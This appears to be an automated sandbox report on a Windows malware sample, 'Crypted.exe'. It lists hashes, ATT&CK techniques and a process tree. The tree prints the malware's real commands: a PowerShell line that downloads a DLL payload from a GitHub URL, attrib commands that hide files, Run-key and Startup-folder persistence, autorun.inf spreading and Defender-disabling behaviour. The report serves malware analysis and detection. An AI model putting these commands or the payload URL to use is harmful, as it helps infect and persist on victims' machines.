1f465a7b1dac4223346ba3070599d95dcdaa071d31d0e0a301322ee4433b4b7a

Analysis

max time kernel
121s
max time network
127s
platform
windows7_x64
resource
win7-20240708-en
resource tags

arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
submitted
28-07-2024 19:57

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Crypted.exe
Size

50KB
MD5

5dd57385d3af83d5a7160e9c14aa09f5
SHA1

64aabb5a9d77cbb8768779c7f3d0231465ea29f0
SHA256

1f465a7b1dac4223346ba3070599d95dcdaa071d31d0e0a301322ee4433b4b7a
SHA512

05eb789f336fe6d4280b085d86774bdc6e818e822a42a9165102dcbd478d16168dbceadd786783547db37f7635a5451211daea3fd008557a1d3f0533326e9ea5
SSDEEP

1536:5GuV08a0ep7+bYrVNXUsyWSBY99w399hVkrf1t0:bYrVOsyWSBY99kq5W

Score

10^/10

discovery evasion execution persistence

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://github.com/NGROKC/CTC/raw/main/SInject2.dll

Signatures

Contains code to disable Windows Defender 3 IoCs

A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

resource	yara_rule
behavioral1/memory/1964-1-0x0000000000B70000-0x0000000000B82000-memory.dmp	disable_win_def
behavioral1/files/0x0008000000016aa4-3.dat	disable_win_def
behavioral1/memory/2340-5-0x0000000001350000-0x0000000001362000-memory.dmp	disable_win_def

Blocklisted process makes network request 2 IoCs

flow	pid	Process
5	1956	powershell.exe
6	1956	powershell.exe

Sets file to hidden 1 TTPs 2 IoCs

Modifies file attributes to stop it showing in Explorer etc.

evasion

Hidden Files and Directories

T1564.001

pid	Process
768	attrib.exe
2608	attrib.exe

Drops startup file 3 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77-caca.exe.exe	$77-caca.exe.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sjava.vbs	$77-caca.exe.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77-caca.exe.exe	$77-caca.exe.exe

Executes dropped EXE 1 IoCs

pid	Process
2340	$77-caca.exe.exe

Loads dropped DLL 6 IoCs

pid	Process
2340	$77-caca.exe.exe
680	WerFault.exe
680	WerFault.exe
680	WerFault.exe
680	WerFault.exe
680	WerFault.exe

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\$77-caca = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\$77-caca.exe.exe"	$77-caca.exe.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\$77-caca = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\$77-caca.exe.exe"	$77-caca.exe.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows\CurrentVersion\Run\$77-caca = "C:\\Users\\Admin\\AppData\\Roaming\\$77-caca.exe.exe"	$77-caca.exe.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1956	powershell.exe

Drops autorun.inf file 1 TTPs 4 IoCs

Malware can abuse Windows Autorun to spread further via attached volumes.

Replication Through Removable Media

T1091

description	ioc	Process
File created	C:\autorun.inf	$77-caca.exe.exe
File opened for modification	C:\autorun.inf	$77-caca.exe.exe
File created	F:\autorun.inf	$77-caca.exe.exe
File opened for modification	F:\autorun.inf	$77-caca.exe.exe

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
680	2340	WerFault.exe	37

System Location Discovery: System Language Discovery 1 TTPs 10 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	certutil.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Crypted.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	$77-caca.exe.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
1956	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	1956	powershell.exe

Suspicious use of WriteProcessMemory 40 IoCs

description	pid	Process	procid_target
PID 1964 wrote to memory of 2240	1964	Crypted.exe	32
PID 1964 wrote to memory of 2240	1964	Crypted.exe	32
PID 1964 wrote to memory of 2240	1964	Crypted.exe	32
PID 1964 wrote to memory of 2240	1964	Crypted.exe	32
PID 2240 wrote to memory of 768	2240	cmd.exe	34
PID 2240 wrote to memory of 768	2240	cmd.exe	34
PID 2240 wrote to memory of 768	2240	cmd.exe	34
PID 2240 wrote to memory of 768	2240	cmd.exe	34
PID 1964 wrote to memory of 2820	1964	Crypted.exe	35
PID 1964 wrote to memory of 2820	1964	Crypted.exe	35
PID 1964 wrote to memory of 2820	1964	Crypted.exe	35
PID 1964 wrote to memory of 2820	1964	Crypted.exe	35
PID 2716 wrote to memory of 2340	2716	explorer.exe	37
PID 2716 wrote to memory of 2340	2716	explorer.exe	37
PID 2716 wrote to memory of 2340	2716	explorer.exe	37
PID 2716 wrote to memory of 2340	2716	explorer.exe	37
PID 2340 wrote to memory of 2576	2340	$77-caca.exe.exe	38
PID 2340 wrote to memory of 2576	2340	$77-caca.exe.exe	38
PID 2340 wrote to memory of 2576	2340	$77-caca.exe.exe	38
PID 2340 wrote to memory of 2576	2340	$77-caca.exe.exe	38
PID 2576 wrote to memory of 2608	2576	cmd.exe	40
PID 2576 wrote to memory of 2608	2576	cmd.exe	40
PID 2576 wrote to memory of 2608	2576	cmd.exe	40
PID 2576 wrote to memory of 2608	2576	cmd.exe	40
PID 2340 wrote to memory of 2664	2340	$77-caca.exe.exe	41
PID 2340 wrote to memory of 2664	2340	$77-caca.exe.exe	41
PID 2340 wrote to memory of 2664	2340	$77-caca.exe.exe	41
PID 2340 wrote to memory of 2664	2340	$77-caca.exe.exe	41
PID 2664 wrote to memory of 1956	2664	cmd.exe	43
PID 2664 wrote to memory of 1956	2664	cmd.exe	43
PID 2664 wrote to memory of 1956	2664	cmd.exe	43
PID 2664 wrote to memory of 1956	2664	cmd.exe	43
PID 2340 wrote to memory of 2036	2340	$77-caca.exe.exe	44
PID 2340 wrote to memory of 2036	2340	$77-caca.exe.exe	44
PID 2340 wrote to memory of 2036	2340	$77-caca.exe.exe	44
PID 2340 wrote to memory of 2036	2340	$77-caca.exe.exe	44
PID 2340 wrote to memory of 680	2340	$77-caca.exe.exe	46
PID 2340 wrote to memory of 680	2340	$77-caca.exe.exe	46
PID 2340 wrote to memory of 680	2340	$77-caca.exe.exe	46
PID 2340 wrote to memory of 680	2340	$77-caca.exe.exe	46

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
768	attrib.exe
2608	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Crypted.exe
"C:\Users\Admin\AppData\Local\Temp\Crypted.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1964
- C:\Windows\SysWOW64\cmd.exe
  cmd.exe /c attrib +s +h +r "C:\Users\Admin\AppData\Local\Temp\Crypted.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2240
- - C:\Windows\SysWOW64\attrib.exe
    attrib +s +h +r "C:\Users\Admin\AppData\Local\Temp\Crypted.exe"
    3⤵
    - Sets file to hidden
    - System Location Discovery: System Language Discovery
    - Views/modifies file attributes
    PID:768
- C:\Windows\SysWOW64\explorer.exe
  "C:\Windows\System32\explorer.exe" C:\ProgramData\caca\$77-caca.exe.exe
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2820

C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
1⤵
- Suspicious use of WriteProcessMemory
PID:2716
- C:\ProgramData\caca\$77-caca.exe.exe
  "C:\ProgramData\caca\$77-caca.exe.exe"
  2⤵
  - Drops startup file
  - Executes dropped EXE
  - Loads dropped DLL
  - Adds Run key to start application
  - Drops autorun.inf file
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2340
- - C:\Windows\SysWOW64\cmd.exe
    cmd.exe /c attrib +s +h +r "C:\ProgramData\caca\$77-caca.exe.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2576
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +s +h +r "C:\ProgramData\caca\$77-caca.exe.exe"
      4⤵
      Sets file to hidden
      System Location Discovery: System Language Discovery
      Views/modifies file attributes
      PID:2608
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c ""C:\Users\Admin\AppData\Local\Temp\inj.bat" "
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2664
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell (new-object System.Net.WebClient).DownloadFile('https://github.com/NGROKC/CTC/raw/main/SInject2.dll','C:\Users\Admin\AppData\Roaming\SInject2.dll');exit
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Drops file in System32 directory
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1956
- - C:\Windows\SysWOW64\certutil.exe
    certutil -encode C:\Users\Admin\AppData\Roaming\SInject1.exe C:\Users\Admin\AppData\Roaming\SInject3.bin
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2036
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 2340 -s 1348
    3⤵
    - Loads dropped DLL
    - Program crash
    PID:680

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Replication Through Removable Media

T1091

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Replication Through Removable Media

T1091

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\caca\$77-caca.exe.exe

Filesize
50KB

MD5
5dd57385d3af83d5a7160e9c14aa09f5

SHA1
64aabb5a9d77cbb8768779c7f3d0231465ea29f0

SHA256
1f465a7b1dac4223346ba3070599d95dcdaa071d31d0e0a301322ee4433b4b7a

SHA512
05eb789f336fe6d4280b085d86774bdc6e818e822a42a9165102dcbd478d16168dbceadd786783547db37f7635a5451211daea3fd008557a1d3f0533326e9ea5

Download Submit
C:\Users\Admin\AppData\Local\Temp\inj.bat

Filesize
257B

MD5
b09cfef3a4b4ad3d325e1da75298680d

SHA1
d78f29730c04b5d340b79ea63478488b087c01dd

SHA256
34e94c47c49e449f2b6ab4bb8157e47e538a72b46d2e4a548aa45c14546a9c26

SHA512
ff84e6abedf2aa20df541a2cd4043bb8eaacb0409d532f5b7d13869827c90b2cb122b86380332f0e191e2ce78eed5add29ad5635e5f9c54e31d0ad85baa6bdda

Download Submit
memory/1964-0-0x0000000074A0E000-0x0000000074A0F000-memory.dmp

Filesize
4KB

Download
memory/1964-1-0x0000000000B70000-0x0000000000B82000-memory.dmp

Filesize
72KB

Download
memory/2340-5-0x0000000001350000-0x0000000001362000-memory.dmp

Filesize
72KB

Download